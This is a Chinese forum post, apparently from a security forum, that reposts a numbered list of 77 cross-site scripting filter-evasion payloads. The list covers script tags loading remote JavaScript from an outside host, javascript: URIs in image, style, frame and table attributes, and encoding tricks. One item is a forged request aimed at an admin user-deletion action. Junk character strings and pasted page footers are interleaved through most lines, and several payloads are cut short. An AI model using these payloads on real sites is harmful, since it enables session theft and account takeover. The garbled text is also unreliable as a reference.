貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。* K: t7 j7 z% b; x
(1)普通的XSS JavaScript注入
1 h5 v: R9 g* N; [3 } |# g<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 e9 B6 p( N' ]" [& b( @5 U' W# D(2)IMG标签XSS使用JavaScript命令
& H+ M# e5 {/ b( Q# }<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>! F4 P& m2 w9 N4 ]4 x
(3)IMG标签无分号无引号0 [+ H5 o) S- m; { x8 I6 f6 w! {7 B
<IMG SRC=javascript:alert(‘XSS’)>
+ G% C! w1 N5 U9 j7 L(4)IMG标签大小写不敏感1 x& J9 X0 }1 B* b& _* H
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>" j% A0 Q& Y) P% @3 a, g$ O# A
(5)HTML编码(必须有分号)1 s3 [# M" f5 c4 ^5 y4 @ [" u
<IMG SRC=javascript:alert(“XSS”)>7 ]1 h @- c H/ V+ Y. r
(6)修正缺陷IMG标签1 m, T$ ], ~, u; V
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>; W: A0 u8 L7 i+ Z, W3 G
# O" K( y5 `( A. P
; N) G" ]( c" q. F5 ?! ~5 X(7)formCharCode标签(计算器)
f* z4 u# Z& L8 \" \% w0 Q9 x: h<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>, A. n. r9 u$ G9 x2 Z K" c
(8)UTF-8的Unicode编码(计算器)/ S# o. E9 J; I! W
<IMG SRC=jav..省略..S')>
2 D+ M$ i; B4 U+ Z(9)7位的UTF-8的Unicode编码是没有分号的(计算器)0 x% y# S# `, G7 A6 H# M, s
<IMG SRC=jav..省略..S')>: [$ h: `, ]0 I6 e p: b
(10)十六进制编码也是没有分号(计算器); `1 l: c( N% ?+ q; J3 {
<IMG SRC=java..省略..XSS')>+ o& R0 F e" B1 I5 \
(11)嵌入式标签,将Javascript分开+ n# [! p% u1 D1 ]5 z
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- C$ u; G `0 E/ u7 s6 W/ z* W(12)嵌入式编码标签,将Javascript分开3 i1 k) h! ~$ f9 W! v
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 u9 ~0 Z( b) @# @) m(13)嵌入式换行符
" R" a+ t0 S" K# D/ K, ], y<IMG SRC=”jav ascript:alert(‘XSS’);”>
# P6 I2 W5 f. z. c1 d# y- |(14)嵌入式回车
+ b9 h8 J% O* S( D<IMG SRC=”jav ascript:alert(‘XSS’);”>3 i; z! E! y) N: L4 @7 X0 m# K
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
; h% f2 F- ~9 h% S<IMG SRC=”javascript:alert(‘XSS‘)”>
8 P0 A1 A8 R6 a4 [# E(16)解决限制字符(要求同页面)
) ?, y- D. u; E* K" q1 k! o/ p<script>z=’document.’</script>
4 j! A, F+ n2 K1 m) G5 L+ @$ d<script>z=z+’write(“‘</script>
$ V1 D% ?* ]/ x5 z4 V8 F<script>z=z+’<script’</script>' ?0 T2 {% P/ p& [6 a) j
<script>z=z+’ src=ht’</script>
7 z" P8 l+ I& B8 B* d: @<script>z=z+’tp://ww’</script>
M; N+ [1 q5 R- y6 Z<script>z=z+’w.shell’</script>8 k+ q: o! D' b% D* k. b
<script>z=z+’.net/1.’</script>: N- m0 `, F2 l+ x
<script>z=z+’js></sc’</script>
, H; v6 w3 }) c# p- m<script>z=z+’ript>”)’</script>
, M5 E7 h- [3 F# r<script>eval_r(z)</script>
j$ O' Y. K) G- M: b. @+ E# f Q7 E(17)空字符12-7-1 T00LS - Powered by Discuz! Board
2 r7 p I; c; J( o) b& X' Y2 ihttps://www.t00ls.net/viewthread ... table&tid=15267 2/6# z7 w! O' C' c+ h1 w( ^
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out/ h9 w: C1 Z- m; e. w
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
( l. p1 j, r+ E' ^. v* t0 lperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out8 H0 ~& Y6 M) ~; O# C; ]* J$ [7 P$ N
(19)Spaces和meta前的IMG标签/ N* V8 P) z" D9 K3 M
<IMG SRC=” javascript:alert(‘XSS’);”>
$ b' s2 Z4 k _' A6 b& ~. ]9 @(20)Non-alpha-non-digit XSS
& _- u/ y+ O! Z" l% Y<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>0 }* j3 ]5 s; j5 c$ @6 d
(21)Non-alpha-non-digit XSS to 2
5 Y, y: c) x/ d4 W! y$ @ P: u<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>) H8 u" P1 n& t* o0 z
(22)Non-alpha-non-digit XSS to 3
' X4 w4 s4 w$ L2 r<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
6 {2 M. e9 S9 b* j(23)双开括号2 A: ~5 G2 s% g: s- q ^
<<SCRIPT>alert(“XSS”);//<</SCRIPT>- z% z* A* {; G% v0 p
(24)无结束脚本标记(仅火狐等浏览器)
) k9 @# Z" J) \. O2 r, H<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>' f7 @1 a& r! V j$ o( u" E
(25)无结束脚本标记21 D. c/ i n$ P* a
<SCRIPT SRC=//3w.org/XSS/xss.js>5 n$ M, u. c! T3 F- i ^
(26)半开的HTML/JavaScript XSS
% P- V( K8 ]" @- M4 Y4 `<IMG SRC=”javascript:alert(‘XSS’)”
3 {) l. R0 B$ Z(27)双开角括号/ G2 f& h: F# y5 E$ |* X& W0 e6 j
<iframe src=http://3w.org/XSS.html <
) ]/ k* U5 T, u7 a! M* w) b7 F(28)无单引号 双引号 分号
' a* b# e. s9 ], v# M( V& R) i<SCRIPT>a=/XSS/) t) ?' [. e9 s6 u' |- l& c
alert(a.source)</SCRIPT>
$ f: G I* z+ U" M: d6 ~% ?- \. r(29)换码过滤的JavaScript: q& j4 L4 E3 k d
\”;alert(‘XSS’);//
( S& r1 A) Y! e0 ]9 F, o0 S& C(30)结束Title标签
1 E* c9 f" p" x, f7 N. J9 h</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>- W5 {0 H4 p& E3 ^$ P
(31)Input Image$ l4 f! r8 _$ l L* U& v
<INPUT SRC=”javascript:alert(‘XSS’);”>
$ j! P5 m& c! ~ Z; @ g: z' m) I(32)BODY Image
3 }2 M+ i( I: O<BODY BACKGROUND=”javascript:alert(‘XSS’)”>) }0 U0 ?$ C" f4 \9 n
(33)BODY标签' f8 {3 B8 i. \% C6 P! G
<BODY(‘XSS’)>; G5 j! a- p; {) b& i
(34)IMG Dynsrc
) ~/ i( e, c+ L1 N: J<IMG DYNSRC=”javascript:alert(‘XSS’)”> n2 F! q0 }* b+ l5 l: A w
(35)IMG Lowsrc0 H5 Y4 o5 P- T6 O+ ~8 E
<IMG LOWSRC=”javascript:alert(‘XSS’)”>/ k$ s F2 L! R2 \- q4 b( x7 z
(36)BGSOUND! O; X. e1 b6 Z; D& t2 |
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
: C9 e3 x) t* x# M% z3 p/ y(37)STYLE sheet0 @ I B* g7 y! h# \: }
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
2 ?' u6 R4 ^. O(38)远程样式表
4 F6 @) @ L9 A0 }4 [0 r7 w, K<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>7 n8 ?& ? s9 \7 l
(39)List-style-image(列表式)
6 K# T5 J, Q0 c7 o, C3 B6 v<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS0 M. C/ q+ ?* Z, n1 e
(40)IMG VBscript
) H, I6 q: A9 s; Q2 z<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
3 r, t' W/ a, m+ R(41)META链接url' K0 g% H, c0 v: t) z$ z2 ^
- O" B& W& I# O; v' V
1 u( S+ i3 O; V* W# ~<META HTTP-EQUIV=”refresh” CONTENT=”0;5 W) X2 d. r9 @* R4 \9 u5 ^, H0 r
URL=http://;URL=javascript:alert(‘XSS’);”>0 e4 W, |( ^; c" u0 T0 t
(42)Iframe
6 _: V% U o4 B5 T2 @8 F5 U<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
; a2 Y( C+ Q" I(43)Frame
2 Z# U. Q$ d1 L* d. w' @% [3 A<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board' j3 [, E8 p' `2 M: H& @$ ^; I8 M* p
https://www.t00ls.net/viewthread ... table&tid=15267 3/6
7 N% w# F/ b% }2 f ^ n(44)Table
" z+ Q+ r& U0 _" s: ?<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>5 V6 ], ~2 r1 Y: H
(45)TD
& _4 q- X4 X m$ e) g- a<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>+ J7 q2 @/ w+ R/ T3 I9 u
(46)DIV background-image
6 u* d8 d; W% J<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>0 u7 p( Y. A7 t- A% c4 D! _$ g: h6 B
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
8 l) H/ N8 ]* X/ w7 d9 o2 Q2 ]8 S8&13&12288&65279)
5 X* ~/ F2 t2 o* q- u: x" y<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>3 v9 H8 O3 \ x" s
(48)DIV expression( q" m. T5 U5 A: i9 v$ R8 q6 m+ }
<DIV STYLE=”width: expression_r(alert(‘XSS’));”> G/ r0 W4 ?$ y! C5 z% u! |
(49)STYLE属性分拆表达$ c- p; i7 E# y1 @1 s; G
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
0 X6 \& F9 {$ ~4 V(50)匿名STYLE(组成:开角号和一个字母开头)# h; ?1 o* E: P8 w
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
1 ?4 C( B9 |" q, L' N0 J9 D6 P(51)STYLE background-image, W8 p5 _9 @3 p/ M( ]7 U) N
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A4 a2 a3 G- f2 a9 j
CLASS=XSS></A>9 N& s, i% l6 S" F
(52)IMG STYLE方式
}- w4 ?6 L; A \6 W% ]; G8 vexppression(alert(“XSS”))’>
8 F6 x @, _1 g0 `(53)STYLE background
d7 K, R1 m$ I' t<STYLE><STYLE7 k$ ~' b2 b" P4 _0 A
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
' r7 x/ A* ]/ Z: w p(54)BASE- ]% ~; L! Z( N7 M1 z/ t% x; n
<BASE HREF=”javascript:alert(‘XSS’);//”>/ [5 x) u% m: R- g
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
, o2 ?$ V. H$ c) ^. H) X! F<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
Z1 B# I" {5 N% @! E(56)在flash中使用ActionScrpt可以混进你XSS的代码! B) L }5 H; Z& E6 {% Q
a=”get”;
: `1 A' G4 S P$ X+ ?b=”URL(\”";
! ^. `6 W! @) C9 O2 mc=”javascript:”;
9 h" c; r. e0 F3 `' sd=”alert(‘XSS’);\”)”;
d) x. ^0 f; i$ j! d2 @0 Eeval_r(a+b+c+d);5 t" b' q: m6 M" p% S( b6 J
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上' {5 A$ }2 M' t/ n2 t6 w5 z
<HTML xmlns:xss>) J+ N- f6 z0 u" B* F3 _3 Y
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
% s6 b3 [6 K5 H<xss:xss>XSS</xss:xss>
: H0 E+ e; q/ J. w/ `8 \. x</HTML>/ n. n$ I* R2 h
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
% o4 ^' m, A: I% D# A<SCRIPT SRC=””></SCRIPT>
* j8 k( ^# u% D$ u6 e$ m9 e(59)IMG嵌入式命令,可执行任意命令
3 f X( R4 |9 f# _5 _0 O0 {9 J7 [1 w<IMG SRC=”http://www.XXX.com/a.php?a=b”>" e! h8 }& N' c
(60)IMG嵌入式命令(a.jpg在同服务器)& H% Q( z) H9 p; J% D
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser2 z: y! t* V" L5 ]2 x$ C
(61)绕符号过滤$ ]5 i) {4 ]+ d8 J. N* Z0 ~
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 B* `5 h$ U* `(62)$ m& S5 n5 Q& o- G" B
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
2 z3 T& m* B3 O$ o(63)
3 ^& \2 w, z8 V" n! X4 e<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
# Y0 Z4 w, a5 r(64)
+ ~5 A+ _7 f) f. r) G<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>, ^+ q* r# Z6 Q8 Z; h
(65)& Q& H% a# o# ]9 n% I! Y
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
" ?. c4 ^9 N3 n- B(66)12-7-1 T00LS - Powered by Discuz! Board2 X( y" ], A* i) G! _
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
* t I9 W5 c" s- r<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 e, X1 Q$ P% e9 J- g9 Z5 a(67)
2 K. x: q6 V( K5 l9 T<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>* r7 W. N6 J6 W# Y
</SCRIPT>
X; l+ _+ B# N" U0 p4 P% Q8 t2 d+ b(68)URL绕行
, v# t3 d& T0 p: L8 z, N<A HREF=”http://127.0.0.1/”>XSS</A>
3 r- f1 X( s% L3 ~(69)URL编码
' K G& x" U1 P% x<A HREF=”http://3w.org”>XSS</A>
( r \, k5 O- T(70)IP十进制
/ T8 u" B( |+ v; j2 _. A9 c- E0 [<A HREF=”http://3232235521″>XSS</A>
5 i0 y, w, s* x# B3 B(71)IP十六进制 P+ [. O* j, b( J
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
7 N2 _8 W' ?: V2 W o+ v1 Q9 J$ v(72)IP八进制* s5 ~! ^2 H! i! \: N
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
$ S# D( R q2 R1 u3 g(73)混合编码6 U9 S& H; B* @, `% [9 S' f6 v
<A HREF=”h
& @: R! G8 c" z& r$ k& T! ctt p://6 6.000146.0×7.147/”">XSS</A>( F: f6 l6 n2 ?; l0 ?* c) J% s
(74)节省[http:]6 P& L# \: e' [- O. n7 s, `
<A HREF=”//www.google.com/”>XSS</A># i: X! j5 V& I7 f+ C% }
(75)节省[www]
5 {5 A5 R O4 s6 W/ t' H% K8 ~/ \3 |<A HREF=”http://google.com/”>XSS</A>- t. u8 @, J) N1 a# x0 ?% [
(76)绝对点绝对DNS* P8 {* k; b8 m3 B" y1 G' F
<A HREF=”http://www.google.com./”>XSS</A>0 B2 H! b. m. ]6 B
(77)javascript链接
$ ~" D! J! o' ~& c! C. w<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>6 u. O1 I, D. N+ J" Q# ?; ]$ _( b4 V
% k3 `$ x$ F# a3 t
原文地址:http://fuzzexp.org/u/0day/?p=14
5 `* L3 @6 `! x; q9 n7 B6 x" v% B) w5 B5 t+ {" l
|
发表于 2013-4-19 19:22:37
收藏
分享
支持
反对